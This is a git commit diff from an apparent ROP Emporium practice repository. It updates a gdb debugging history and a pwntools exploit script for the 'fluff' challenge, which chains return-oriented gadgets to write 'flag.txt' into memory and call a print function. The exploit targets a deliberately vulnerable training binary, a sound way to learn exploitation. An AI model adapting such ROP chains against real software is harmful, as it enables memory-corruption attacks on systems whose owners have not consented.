deleted: x86_64/badchars/core

modified:   x86_64/fluff/.gdb_history
	deleted:    x86_64/fluff/core
	modified:   x86_64/fluff/exploit.py
	deleted:    x86_64/ret2win/core
	deleted:    x86_64/split/core
	deleted:    x86_64/write4/core
This commit is contained in:
Brett Weiland 2020-12-18 01:42:14 -06:00
parent 4c25bd9188
commit 406768c5fe
7 changed files with 46 additions and 31 deletions

Binary file not shown.

View File

@ -1,19 +1,4 @@
quit
quit
continue
nexti
nexti
info reg rdi
stepi
nexti
info reg rcx
nexti
info reg rbx
stepi
info reg rdx
inro reg rbx
info reg rbx
quit
stepi
continue
stepi
@ -237,3 +222,35 @@ x/x 0x601be0 + 8
x/x 0x601be0 + 9
x/x 0x601be0 + 10
quit
continue
context
x/x 0x7fff0b74fed0
x/100x 0x7fff0b74fed0
quit
break *0x400639
continue
context
continue
x/s 0x601be0
continue
x/s 0x601be0
stepi
stepi
x/s 0x601be0
quit
continue
continue
quit
break *0x00000000004006a3
continue
continue
quit
break pwnme
run
continue
break *0x00000000004006a3
continue
info reg rip
continue
info reg rip
quit

Binary file not shown.

View File

@ -13,37 +13,35 @@ letter_lookups = {
def write_str(dest, string, payload):
payload += p64(0x00000000004006a3)
payload += p64(dest)
for c in string:
payload += p64(0x40062a)
payload += p64(0x4000) # if things go wrong, check endian/order
payload += p64(0x0000000000400610)
payload += p64(1)
payload += p64(0x40062a)
payload += p64(0x4000)
payload += p64(letter_lookups[string[0]] - 0x3ef2)
payload += p64(0x400628)
payload += p64(0x400639)
for c in string[1:]:
payload += p64(0x40062b)
payload += p64(letter_lookups[c] - 0x3ef2)
payload += p64(0x0000000000400610)
payload += p64(0)
payload += p64(1)
payload += p64(0x400628)
payload += p64(0x400639)
return(payload)
prog = gdb.debug('./fluff', gdbscript='''
break *pwnme + 151
'''
)
prog = process('./fluff')
payload = b''
for c in range(40):
payload += b'a'
payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
payload += p64(0x00000000004006a3)
payload += p64(0x601be0) # set rdi
payload += p64(0x601be0)
payload += p64(0x0000000000400510)
payload += b"\n"
prog.sendline(payload)
sleep(1)
print(str(prog.recv(), 'UTF-8'))
prog.interactive()

Binary file not shown.

Binary file not shown.

Binary file not shown.